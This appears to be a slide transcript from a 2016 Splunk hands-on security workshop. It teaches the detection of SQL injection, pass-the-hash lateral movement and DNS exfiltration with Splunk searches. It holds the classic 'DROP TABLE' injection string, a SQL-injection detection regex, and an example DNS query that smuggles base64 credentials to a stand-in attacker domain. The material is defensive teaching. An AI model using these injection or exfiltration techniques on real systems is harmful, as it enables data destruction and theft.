Splunk Enterprise for InfoSec Hands-On
58
Copyright © 2016 Splunk Inc. Splunk Enterprise for Information Security Hands-On Long Beach | December 1, 2016 Presenters: Beau Morgan & Mark Bonsack
-
Upload
splunk -
Category
Technology
-
view
337 -
download
5
Transcript of Splunk Enterprise for InfoSec Hands-On
Copyright©2016SplunkInc.
SplunkEnterpriseforInformationSecurity
Hands-OnLongBeach|December1,2016
Presenters:BeauMorgan&MarkBonsack
2
SafeHarborStatementDuringthecourseofthispresentation,wemaymakeforward-lookingstatementsregardingfutureeventsortheexpectedperformanceofthecompany.Wecautionyouthatsuchstatementsreflectourcurrentexpectations and estimates basedonfactorscurrentlyknowntousandthatactualeventsorresultscoulddiffermaterially.Forimportantfactorsthatmaycauseactualresultstodifferfromthosecontainedinourforward-lookingstatements,pleasereviewourfilings withtheSEC. Theforward-lookingstatementsmadeinthispresentationarebeingmadeasofthetimeanddateofitslivepresentation. If reviewedafter itslivepresentation, thispresentationmaynotcontaincurrentoraccurateinformation. Wedonotassumeanyobligationtoupdateanyforward-lookingstatementswe may make. Inaddition,anyinformationaboutour roadmapoutlinesourgeneralproductdirectionandissubjecttochangeatanytimewithoutnotice. It isforinformationalpurposesonlyandshallnot beincorporatedintoanycontractorothercommitment. Splunkundertakesnoobligationeithertodevelopthefeaturesorfunctionalitydescribed ortoincludeanysuchfeatureorfunctionalityinafuturerelease.
3
A-B – 01C-D– 02E-F– 03G-H– 04I-K– 05
L-M– 06N-P– 07Q-S– 08T-V– 09W-Z– 10
https://od-sl-longbeach-sec-XX.splunkoxygen.comUsername:splunklive Password:security
Hands-On:What’sYourFirstInitial?
4
Agenda
Intro
WebAttacks
LateralMovement
DNSExfiltration
Wrap-up/Q&A
Copyright©2016SplunkInc.
Intro
Machinedatacontainsadefinitiverecordofallinteractions
Splunkisaveryeffectiveplatformtocollect,store,andanalyzeallofthatdata
Human Machine
Machine Machine
SplunkSolutions>EasytoAdoptAcrossDataSources,UseCases&ConsumptionModels
PlatformforOperationalIntelligence
RichEcosystemofApps&Add-Ons
SplunkPremiumSolutions
MainframeData
RelationalDatabasesMobileForwarders Syslog/TCP IoT
DevicesNetworkWireData Hadoop
SplunkPositionedasa LeaderinGartner2016MagicQuadrantforSecurityInformationandEventManagement*
*Gartner,Inc.,2016MagicQuadrantforSecurityInformationandEventManagement,andCriticalCapabilitiesforSecurityInformationandEventManagement,OliverRochford,KellyM.Kavanagh,TobyBussa.10August2016ThisgraphicwaspublishedbyGartner,Inc.aspartofalargerresearchdocumentandshouldbeevaluatedinthecontextoftheentiredocument.TheGartnerdocumentisavailableuponrequestfromSplunk.Gartnerdoesnotendorseanyvendor,productorservicedepictedinitsresearchpublications,anddoesnotadvisetechnologyuserstoselectonlythosevendorswith thehighestratingsorotherdesignation.GartnerresearchpublicationsconsistoftheopinionsofGartner'sresearchorganizationandshouldnotbeconstruedasstatementsoffact.Gartnerdisclaimsallwarranties,expressedorimplied, withrespecttothisresearch,includinganywarrantiesofmerchantabilityorfitnessforaparticularpurpose.
Ø Fouryearsinarowasaleader
Ø FurthestoverallinCompletenessofVision
Ø Splunkalsoscoreshighestin2016CriticalCapabilitiesforSIEMreportinallthreeusecases
9
GartnerCriticalCapabilitiesforSIEM
9
*Gartner,Inc.,2016MagicQuadrantforSecurityInformationandEventManagement,andCriticalCapabilitiesforSecurityInformationandEventManagement,OliverRochford,KellyM.Kavanagh,TobyBussa.10August2016ThisgraphicwaspublishedbyGartner,Inc.aspartofalargerresearchdocumentandshouldbeevaluatedinthecontextoftheentiredocument.TheGartnerdocumentisavailableuponrequestfromSplunk.Gartnerdoesnotendorseanyvendor,productorservicedepictedinitsresearchpublications,anddoesnotadvisetechnologyuserstoselectonlythosevendorswith thehighestratingsorotherdesignation.GartnerresearchpublicationsconsistoftheopinionsofGartner'sresearchorganizationandshouldnotbeconstruedasstatementsoffact.Gartnerdisclaimsallwarranties,expressedorimplied, withrespecttothisresearch,includinganywarrantiesofmerchantabilityorfitnessforaparticularpurpose.
1.BasicSecurityMonitoring 2.AdvancedThreatDetection 3.Forensics&IncidentResponse
Copyright©2016SplunkInc.
WebAttacks
11
OWASP2013Top10[10]Unvalidated redirectsandforwards[9]Usingcomponentswithknownvulnerabilities[8]Cross-siterequestforgery[7]Missingfunctionlevelaccesscontrol[6]Sensitivedataexposure[5]Securitymisconfiguration[4]Insecuredirectobjectreference[3]Cross-sitescripting(XSS)[2]Brokenauthenticationandsessionmanagement
12
[1]InjectionSQLinjectionCodeinjectionOScommandingLDAPinjectionXMLinjectionXPath injectionSSIinjectionIMAP/SMTPinjectionBufferoverflow
WhydidIgetbreached?
SQLi hasbeenaroundavery,verylongtime…
13
Source:ImpervaWebAttacksReport,2015
14
TalkTalk:PII/financialdatafor4McustomersVTech:PIIfor5Madults+kids
15
…andsofarthisyear…45
16
LittleBobbyTables
17
WhyDidBobby’sSchoolLoseTheirRecords?
$sql = "INSERT INTO Students (Name) VALUES ('" . $studentName . "');";
execute_sql($sql);
$studentName
1
2
18
INSERT INTO Students (Name) VALUES ('John');
WhyDidBobby’sSchoolLoseTheirRecords?
John
$studentName
19
WhyDidBobby’sSchoolLoseTheirRecords?
Robert'); DROP TABLE Students;--
INSERT INTO Students (Name) VALUES ('Robert'); DROP TABLE Students;--');
20
SpeedCameraTicketAvoidance
Let’sgethands-on!
22
A-B – 01C-D– 02E-F– 03G-H– 04I-K– 05
L-M– 06N-P– 07Q-S– 08T-V– 09W-Z– 10
https://od-sl-longbeach-sec-XX.splunkoxygen.comUsername:splunklive Password:security
Hands-On:What’sYourFirstInitial?
23
ALittleAboutOurEnvironmentOurlearningenvironmentconsistsof ~5.5Mevents,fromrealenvironments,butsanitized:
• WindowsSecurityevents• Apachewebaccesslogs• BroDNS&HTTP• PaloAltotrafficlogs• Someothervariousbits
24
OR
AreYouaNewbieorNinja?
Let’sgethands-on!
WebAttacks
26
https://splunkbase.splunk.com/app/1528/
SearchforpossibleSQLinjectioninyourevents:ü looksforpatternsinURIqueryfieldtoseeif
anyonehasinjectedthemwithSQLstatements
ü usestandarddeviationsthatare2.5timesgreaterthantheaveragelengthofyourURIqueryfield
Macrosused• sqlinjection_pattern(sourcetype,uri queryfield)• sqlinjection_stats(sourcetype,uri queryfield)
27
`sqlinjection_rex`isasearchmacro.Itcontains:
(?<injection>(?i)select.*?from|union.*?select|\'$|delete.*?from|update.*?set|alter.*?table|([\%27|\'](%20)*=(%20)*[\%27|\'])|\w*[%27|\']or)
Whichmeans:Inthestringwearegiven,lookforANY ofthefollowingmatchesandputthatintothe“injection”field.AnythingcontainingSELECTfollowedbyFROMAnythingcontainingUNIONfollowedbySELECTAnythingwitha‘attheendAnythingcontainingDELETEfollowedbyFROMAnythingcontainingUPDATEfollowedbySETAnythingcontainingALTERfollowedbyTABLEA%27ORa‘andthena%20andanyamountofcharactersthena%20andthena%27ORa‘
Note:%27isencoded“’”and%20isencoded<space>Anyamountofwordcharactersfollowedbya%27ORa‘andthen“or”
RegularExpressionsFTW
28
Bonus:TryouttheSQLInjectionSearch app!
29
Summary:WebAttacks/SQLInjectionSQLinjectionprovideattackerswitheasyaccesstodataDetectingadvancedSQLinjectionishard– useanapp!UnderstandwhereSQLi ishappeningonyournetworkandputastoptoitAugmentyourWAFwithenterprise-wideSplunksearches
Copyright©2016SplunkInc.
LateralMovement
31
PokingAround
Anattackerhacksanon-privilegedusersystem.
Sowhat?
32
LateralMovement
LateralMovementistheexpansionofsystemscontrolled,anddataaccessed.
33
MostFamousLateralMovementAttack?(excludingpasswordre-use)
PasstheHash!
34
ThisandothertechniquesusedindestructiveSands breach…
…andatSony,too.
35
DetectingLegacyPtHLookforWindowsEvents:EventID:4624or4625Logontype:3Auth package:NTLMUseraccountisnotadomainlogon,orAnonymousLogon
…thisistriviallyeasyinSplunk
Let’sgethands-on!
LateralMovement:Legacy
37
ThenItGotHarderPasstheHashtoolshaveimprovedTrackingofjitter,othermetricsSolet’sdetectlateralmovementdifferently
38
NetworkTrafficProvidesSourceofTruthIusuallytalkto10hostsThenonedayItalkto10,000hostsALARM!
Let’sgethands-on!
LateralMovement:NetworkTraffic
40
iz sohard…uhazmagic?
41
izsohard…uhazmagic?Comesee…
atthedemobooths
UBA
42
Summary:LateralMovementAttackersuccessdefinesscopeofabreachHighdifficulty,highimportanceWorthdoinginSplunkEasywithUBA
Copyright©2016SplunkInc.
DNSExfiltration
44
domain=corp;user=dave;password=12345
encrypt
DNSQuery:ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com
ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==
45
DNSexfil tendstobeoverlookedwithinanoceanofDNSdata.
Let’sfixthat!
DNSExfiltration
46
FrameworkPOS:acard-stealingprogramthatexfiltrates datafromthetarget’snetworkbytransmittingitasdomainnamesystem(DNS)traffic
Butthebigdifferenceisthewayhowstolendataisexfiltrated:themalwareusedDNSrequests!https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-
variant-exfiltrates-data-via-dns-requests
“”
…feworganizationsactuallykeepdetailedlogsorrecordsof theDNStraffictraversingtheirnetworks—makingitanidealwaytosiphondatafromahackednetwork.
http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#more-30872
“”
DNSExfiltration
47
https://splunkbase.splunk.com/app/2734/
DNSexfil detection– tricksofthetradeü parseURLs&complicatedTLDs(TopLevelDomain)ü calculateShannonEntropy
Listofprovidedlookups• ut_parse_simple(url)• ut_parse(url,list)orut_parse_extended(url,list)• ut_shannon(word)• ut_countset(word,set)• ut_suites(word,sets)• ut_meaning(word)• ut_bayesian(word)• ut_levenshtein(word1,word2)
48
Examples• Thedomainaaaaa.com hasaShannonEntropyscoreof1.8 (verylow)• Thedomaingoogle.com hasaShannonEntropyscoreof2.6 (ratherlow)• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com hasaShannon
Entropyscoreof3 (ratherhigh)
Layman’sdefinition:ascorereflectingtherandomness ormeasureofuncertainty ofastring
ShannonEntropy
49
DetectingDataExfiltration
index=brosourcetype=bro_dns|`ut_parse(query)`|`ut_shannon(ut_subdomain)`|eval sublen =length(ut_subdomain)|tableut_domain ut_subdomainut_shannon sublen
TIPSq LeverageourBroDNSdataq CalculateShannonEntropyscoresq Calculatesubdomainlengthq DisplayDetails
Let’sgethands-on!
LateralMovement:DNSExfiltration
51
DetectingDataExfiltration
…|statscountavg(ut_shannon)asavg_shaavg(sublen)asavg_sublenstdev(sublen)asstdev_sublenbyut_domain|searchavg_sha>3avg_sublen>20stdev_sublen<2
TIPSq LeverageourBroDNSdataq CalculateShannonEntropyscoresq Calculatesubdomainlengthq Displaycount,scores,lengths,
deviations
52
DetectingDataExfiltrationRESULTS• Exfiltrating datarequiresmanyDNSrequests– lookforhighcounts• DNSexfiltrationtomooo.com and chickenkiller.com
53
Summary:DNSExfiltrationExfiltrationbyDNSandICMPisaverycommontechniqueManyorganizationsdonotanalyzeDNSactivity– donotbelikethem!NoDNSlogs?NoSplunk Stream?LookatFWbytecounts
Copyright©2016SplunkInc.
Wrap-up/Q&A
55
SummaryMultiplephasestomodernattacksDeploydetectionacrossallphasesAlsoconsideradaptiveresponse!Stayabreastofmodernadvancements
Today’scontent(PDF):
https://splunk.box.com/v/SplunkLive-Security-Handout
56
AnalyticsDrivenSecurityhttps://www.splunk.com/en_us/solutions/solution-areas/security-and-fraud/security-investigation.html
• 5,000+ITandBusinessProfessionals• 175+Sessions• 80+CustomerSpeakers
PLUSSplunk University• Threedays:Sept23-25,2017• GetSplunk CertifiedforFREE!• GetCPEcreditsforCISSP,CAP,SSCP
SEPT25-28,2017WalterE.WashingtonConventionCenterWashington,D.C.CONF.SPLUNK.COM
The8th AnnualSplunkWorldwideUsers’Conference
ThankYou
